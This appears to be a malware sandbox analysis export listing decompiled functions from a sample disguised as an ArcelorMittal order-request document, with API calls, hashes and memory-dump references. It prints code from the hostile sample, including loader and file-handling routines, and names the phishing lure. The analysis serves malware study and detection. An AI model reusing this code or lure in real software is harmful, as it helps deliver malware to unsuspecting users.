Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 02f0ac1b67cb2627b76fb2ddbe3cc81ab2ed57dd30b63018c57652a54df5b954
Instruction ID: ed417bde94489f19056025a1bce11d2b054895382ff63e29ca54f2f43ae8860f
Opcode Fuzzy Hash: 02f0ac1b67cb2627b76fb2ddbe3cc81ab2ed57dd30b63018c57652a54df5b954
Instruction Fuzzy Hash: AFE048727141049BCB14DBA8DD808AE77A6A784310714843BD502B3660C678DD10CF68

Uniqueness

Uniqueness Score: -1.00%

Function 00406408 Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406408(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a400);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a400));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a404));
				}
				_t5 = E0040639C(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}

0x00406410
0x00406413
0x0040641a
0x00406422
0x0040642e
0x00000000
0x00406435
0x00406425
0x0040642c
0x00000000
0x0040643d
0x00000000

APIs

GetModuleHandleA.KERNEL32(?,?,00000020,004032E9,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040641A
GetProcAddress.KERNEL32(00000000,?), ref: 00406435

Part of subcall function 0040639C: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063B3
Part of subcall function 0040639C: wsprintfW.USER32 ref: 004063EE
Part of subcall function 0040639C: LoadLibraryW.KERNELBASE(?), ref: 004063FE

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: f58656703257d3684848e4558ce263f5efe09ac277fa21959b5ddbdc7fcd416a
Instruction ID: 1e5dc79a2ed4663847ded95c08da113472191569ceef3ff13fe49cb738333a03
Opcode Fuzzy Hash: f58656703257d3684848e4558ce263f5efe09ac277fa21959b5ddbdc7fcd416a
Instruction Fuzzy Hash: 67E0863660422056D2105B745E44D3762A89F94700306043EFA42F2041DB789C32AB6D

Uniqueness

Uniqueness Score: -1.00%

Function 00401DDC Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DF2
EnableWindow.USER32(00000000,00000000), ref: 00401DFD

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: a0400a1b9fb92a3480c647e1a3800c271ea7f123647fdd228604a41f3657c97f
Instruction ID: b4fe0a8816f2230fb6c640b22720df2591e8103d6b5d86596318fd3cb962ccd0
Opcode Fuzzy Hash: a0400a1b9fb92a3480c647e1a3800c271ea7f123647fdd228604a41f3657c97f
Instruction Fuzzy Hash: B9E0C2326005009FCB10AFF5AF4999D3375EF90369710407FE402F10E1CABC9C408A2D

Uniqueness

Uniqueness Score: -1.00%

Function 00405C07 Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00405C07(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x00405c0b
0x00405c18
0x00405c2d
0x00405c33

APIs

GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe,80000000,00000003,?,?,00000000,00403517,?), ref: 00405C0B
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,00403517,?), ref: 00405C2D

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
Instruction ID: a29eaa7254a97888a18cbfd792fe15e84c6d283973f4e4682f27fdddc38ff468
Opcode Fuzzy Hash: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
Instruction Fuzzy Hash: 71D09E71654601AFEF098F20DE16F2E7AA2FB84B00F11562CB682940E0DAB158199B15

Uniqueness

Uniqueness Score: -1.00%

Function 00405BE2 Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405BE2(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}

0x00405be7
0x00405bed
0x00405bf2
0x00405bfb
0x00405bfb
0x00405c04

APIs

GetFileAttributesW.KERNELBASE(?,?,004057E7,?,?,00000000,004059BD,?,?,?,?), ref: 00405BE7
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405BFB

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
Instruction ID: 2c4e6be97b113ceed9239146329651d13cb313475d1ce615590156906e373da3
Opcode Fuzzy Hash: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
Instruction Fuzzy Hash: 07D01272504520AFC2102738EF0C89BBF55EB543717064B35FAF9A22F0CB314C56DA98

Uniqueness

Uniqueness Score: -1.00%

Function 004056DD Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004056DD(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

0x004056e3
0x004056eb
0x00000000
0x004056f1
0x00000000

APIs

CreateDirectoryW.KERNELBASE(?,00000000,00403270,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034A9), ref: 004056E3
GetLastError.KERNEL32 ref: 004056F1

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
Instruction ID: 43b8cc017be4ea794887f60b7ff78796ccb4e437ad0dace2cbd4982aac0f1f36
Opcode Fuzzy Hash: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
Instruction Fuzzy Hash: 02C04C30614602DBD6105B20DE08B177950EB54781F518839614AE11A0DA768455FF2D

Uniqueness

Uniqueness Score: -1.00%

Function 00401673 Relevance: 1.5, APIs: 1, Instructions: 38
fileCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E00401673() {
				int _t7;
				void* _t13;
				void* _t15;
				void* _t20;

				_t18 = E00402BBF(0xffffffd0);
				_t16 = E00402BBF(0xffffffdf);
				E00402BBF(0x13);
				_t7 = MoveFileW(_t4, _t5); // executed
				if(_t7 == 0) {
					if( *((intOrPtr*)(_t20 - 0x24)) == _t13 || E00406375(_t18) == 0) {
						 *((intOrPtr*)(_t20 - 4)) = 1;
					} else {
						E00405ED3(_t15, _t18, _t16);
						_push(0xffffffe4);
						goto L5;
					}
				} else {
					_push(0xffffffe3);
					L5:
					E00401423();
				}
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t20 - 4));
				return 0;
			}

0x0040167c
0x00401685
0x00401687
0x0040168e
0x00401696
0x004016a2
0x0040281e
0x004016b6
0x004016b8
0x004016bd
0x00000000
0x004016bd
0x00401698
0x00401698
0x004021dc
0x004021dc
0x004021dc
0x00402a4f
0x00402a5b

APIs

MoveFileW.KERNEL32(00000000,00000000), ref: 0040168E

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: FileMove
String ID:
API String ID: 3562171763-0
Opcode ID: c3778459728d826bbdac694ea121f0bef50cf8d752e3b99a0464db8e1b3f2e90
Instruction ID: 39a705c871337a298e289750b84dd0ffd285fe21b7fc35a555db8342d30c8454
Opcode Fuzzy Hash: c3778459728d826bbdac694ea121f0bef50cf8d752e3b99a0464db8e1b3f2e90
Instruction Fuzzy Hash: 38F0B431604114A7CB10BBBA4F0DD5F32A59B82338B24467BF911F21D5DAFC8A4186AF

Uniqueness

Uniqueness Score: -1.00%

Function 02FA300E Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

EnumWindows.USER32 ref: 02FA3040

Memory Dump Source

Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Yara matches

Similarity

API ID: EnumWindows
String ID:
API String ID: 1129996299-0
Opcode ID: 3fc0ef24de34a6110cc5c89b7c9732723c54922661528c7e9ced36574310adbe
Instruction ID: 4868c5e089fc1633234a14fca1d55752fe158a97e13c4331a52ead81047149f3
Opcode Fuzzy Hash: 3fc0ef24de34a6110cc5c89b7c9732723c54922661528c7e9ced36574310adbe
Instruction Fuzzy Hash: CCF0E5B95546888FC719DF18DC607D93B61BFC7224F54443DCA468BB91DA321956CA80

Uniqueness

Uniqueness Score: -1.00%

Function 00402786 Relevance: 1.5, APIs: 1, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E00402786(void* __eflags) {
				long _t7;
				long _t9;
				LONG* _t11;
				void* _t13;
				void* _t15;
				void* _t17;

				_push(ds);
				if(__eflags != 0) {
					_t7 = E00402BA2(2);
					_t9 = SetFilePointer(E00405F92(_t13, _t15), _t7, _t11,  *(_t17 - 0x20)); // executed
					if( *((intOrPtr*)(_t17 - 0x28)) >= _t11) {
						_push(_t9);
						_push( *((intOrPtr*)(_t17 - 0x10)));
						E00405F79();
					}
				}
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}

0x00402786
0x00402787
0x00402793
0x004027a0
0x004027a9
0x004029ee
0x004029ef
0x004029f2
0x004029f2
0x004027a9
0x00402a4f
0x00402a5b

APIs

SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 004027A0

Part of subcall function 00405F79: wsprintfW.USER32 ref: 00405F86

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: FilePointerwsprintf
String ID:
API String ID: 327478801-0
Opcode ID: e6b1ca666dcbd82e8a1de2ea37f9ef81104a41e8613c43d0bfa43493d1c7e0f2
Instruction ID: 6e13d26e98101992f91f16a3b10818fa49d07bfc2575382a514d36e2453af549
Opcode Fuzzy Hash: e6b1ca666dcbd82e8a1de2ea37f9ef81104a41e8613c43d0bfa43493d1c7e0f2
Instruction Fuzzy Hash: 33E04F71701518AFDB41AFA59E4ACBF776AEB40328B14843BF105F00E1CABD8C119A2E

Uniqueness

Uniqueness Score: -1.00%

Function 0040172D Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040172D() {
				long _t5;
				WCHAR* _t8;
				WCHAR* _t12;
				void* _t14;
				long _t17;

				_t5 = SearchPathW(_t8, E00402BBF(0xffffffff), _t8, 0x400, _t12, _t14 + 8); // executed
				_t17 = _t5;
				if(_t17 == 0) {
					 *((intOrPtr*)(_t14 - 4)) = 1;
					 *_t12 = _t8;
				}
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t14 - 4));
				return 0;
			}

0x00401741
0x00401747
0x00401749
0x004027ec
0x004027f3
0x004027f3
0x00402a4f
0x00402a5b

APIs

SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401741

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: PathSearch
String ID:
API String ID: 2203818243-0
Opcode ID: 6c3bf02cedd953c02cf191020c70236bab39714c6f7018b829d4b0d23e56155e
Instruction ID: b70941bc7738bb9b0414a64e3b7b2b1df016234940ef209bc10d8c2c44c885ef
Opcode Fuzzy Hash: 6c3bf02cedd953c02cf191020c70236bab39714c6f7018b829d4b0d23e56155e
Instruction Fuzzy Hash: 81E08071300100ABD750CFA4DE49AAA776CDF40378F20417BF515E61D1E6B49A41972D

Uniqueness

Uniqueness Score: -1.00%

Function 00402CC9 Relevance: 1.5, APIs: 1, Instructions: 22
registryCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00402CC9(void* __eflags, void* _a4) {
				short* _t8;
				intOrPtr _t9;
				signed int _t11;

				_t8 = E00402BBF(0x22);
				_t9 =  *0x40cdc8; // 0x2f6fc4c
				_t3 = _t9 + 4; // 0x160
				_t11 = RegOpenKeyExW(E00402CB4( *_t3), _t8, 0,  *0x7a8af0 | _a4,  &_a4); // executed
				asm("sbb eax, eax");
				return  !( ~_t11) & _a4;
			}

0x00402cdd
0x00402ce3
0x00402ce8
0x00402cf1
0x00402cf9
0x00402d01

APIs

RegOpenKeyExW.KERNELBASE(00000000,00000160,00000000,00000022,00000000,?,?,?,0040232B,00000002), ref: 00402CF1

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 9da2ebaaada2ed444504018bdaab7b440fc23c9bd071d66725cd28ab7958d0a8
Instruction ID: 818ee9457f1dd57358e842bea021a20957f37b1b048482a93cb04bcf3cfa71ad
Opcode Fuzzy Hash: 9da2ebaaada2ed444504018bdaab7b440fc23c9bd071d66725cd28ab7958d0a8
Instruction Fuzzy Hash: DBE08676250108BFDB00DFA8DE47FD537ECAB44700F008021BA08D70D1C774E5408768

Uniqueness

Uniqueness Score: -1.00%

Function 00405C8A Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405C8A(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405c8e
0x00405c9e
0x00405ca6
0x00000000
0x00405cad
0x00000000
0x00405caf

APIs

